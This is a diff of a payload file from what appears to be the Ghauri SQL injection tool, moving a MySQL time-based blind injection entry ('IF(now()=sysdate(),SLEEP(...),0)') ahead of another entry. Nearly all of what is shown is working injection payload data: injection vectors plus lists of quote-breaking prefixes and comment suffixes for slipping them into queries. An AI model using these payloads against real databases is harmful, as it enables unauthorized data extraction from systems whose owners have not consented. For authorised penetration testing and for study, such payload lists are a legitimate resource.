■ ■ ■ ■ ■ ■
ghauri/common/payloads.py
| skipped 429 lines |
430 | 430 | | "dbms": "MySQL", |
431 | 431 | | }, |
432 | 432 | | { |
| 433 | + | "payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)", |
| 434 | + | "comments": [ |
| 435 | + | {"pref": "'XOR(", "suf": ")XOR'Z"}, |
| 436 | + | {"pref": '"XOR(', "suf": ')XOR"Z'}, |
| 437 | + | {"pref": "", "suf": ""}, |
| 438 | + | {"pref": "", "suf": "-- wXyW"}, |
| 439 | + | {"pref": "'AND(", "suf": ")AND'Z"}, |
| 440 | + | {"pref": "'OR(", "suf": ")OR'Z"}, |
| 441 | + | {"pref": '"OR(', "suf": ')OR"Z'}, |
| 442 | + | {"pref": " AND ", "suf": "-- wXyW"}, |
| 443 | + | {"pref": "' AND ", "suf": "-- wXyW"}, |
| 444 | + | {"pref": '" AND ', "suf": "-- wXyW"}, |
| 445 | + | {"pref": ") AND ", "suf": "-- wXyW"}, |
| 446 | + | {"pref": "') AND ", "suf": "-- wXyW"}, |
| 447 | + | {"pref": '") AND ', "suf": "-- wXyW"}, |
| 448 | + | # {"pref": ") OR ", "suf": "OR(1=1-- wXyW"}, |
| 449 | + | # {"pref": "') OR ", "suf": "OR('1'='1 wXyW"}, |
| 450 | + | # {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'}, |
| 451 | + | ], |
| 452 | + | "title": "MySQL >= 5.0.12 time-based blind (IF - comment)", |
| 453 | + | "vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)", |
| 454 | + | "dbms": "MySQL", |
| 455 | + | }, |
| 456 | + | { |
433 | 457 | | "payload": "(SELECT CASE WHEN(1234=1234) THEN SLEEP([SLEEPTIME]) ELSE 0 END)", |
434 | 458 | | "comments": [ |
435 | 459 | | {"pref": "'XOR", "suf": "XOR'Z"}, |
| skipped 19 lines |
455 | 479 | | ], |
456 | 480 | | "title": "MySQL >= 5.0.12 time-based blind (CASE STATEMENT)", |
457 | 481 | | "vector": "(SELECT CASE WHEN([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE 0 END)", |
458 | | - | "dbms": "MySQL", |
459 | | - | }, |
460 | | - | { |
461 | | - | "payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)", |
462 | | - | "comments": [ |
463 | | - | {"pref": "'XOR(", "suf": ")XOR'Z"}, |
464 | | - | {"pref": '"XOR(', "suf": ')XOR"Z'}, |
465 | | - | {"pref": "", "suf": ""}, |
466 | | - | {"pref": "", "suf": "-- wXyW"}, |
467 | | - | {"pref": "'AND(", "suf": ")AND'Z"}, |
468 | | - | {"pref": "'OR(", "suf": ")OR'Z"}, |
469 | | - | {"pref": '"OR(', "suf": ')OR"Z'}, |
470 | | - | {"pref": " AND ", "suf": "-- wXyW"}, |
471 | | - | {"pref": "' AND ", "suf": "-- wXyW"}, |
472 | | - | {"pref": '" AND ', "suf": "-- wXyW"}, |
473 | | - | {"pref": ") AND ", "suf": "-- wXyW"}, |
474 | | - | {"pref": "') AND ", "suf": "-- wXyW"}, |
475 | | - | {"pref": '") AND ', "suf": "-- wXyW"}, |
476 | | - | # {"pref": ") OR ", "suf": "OR(1=1-- wXyW"}, |
477 | | - | # {"pref": "') OR ", "suf": "OR('1'='1 wXyW"}, |
478 | | - | # {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'}, |
479 | | - | ], |
480 | | - | "title": "MySQL >= 5.0.12 time-based blind (IF - comment)", |
481 | | - | "vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)", |
482 | 482 | | "dbms": "MySQL", |
483 | 483 | | }, |
484 | 484 | | { |
| skipped 1580 lines |